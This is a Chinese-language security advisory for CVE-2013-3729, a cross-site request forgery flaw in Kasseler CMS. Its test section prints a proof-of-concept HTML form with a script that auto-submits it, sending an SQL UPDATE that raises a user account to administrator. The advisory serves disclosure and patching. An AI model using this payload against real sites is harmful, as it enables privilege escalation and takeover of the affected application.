发布日期:2013-07-03
更新日期:2013-07-05
受影响系统:
Kasseler CMS Kasseler CMS <= 2 r1223
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60929
CVE(CAN) ID: CVE-2013-3729
Kasseler CMS是内容管理系统。
Kasseler CMS 存在跨站请求伪造漏洞,此漏洞源于整个应用中缺少CSRF保护机制。远程攻击者可诱使已经登录的管理员浏览特制的网页,这些网页带有CSRF利用代码,利用此漏洞在应用的数据库中执行任意SQL查询并完全控制应用。
<*来源:High-Tech Bridge Security Research Lab
链接:https://www.htbridge.com/advisory/HTB23158
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<form action="http://[host]/admin.php?module=database&do=sql_query " method="post">
<input type="hidden" value="UPDATE `kasseler`.`kasseler_users` SET `user_level` = '2', `user_group` =
'1' WHERE `kasseler_users`.`uid` =2 LIMIT 1 ;">
<input type="submit">
</form>
<script>
document.main.submit();
</script>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Kasseler CMS
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: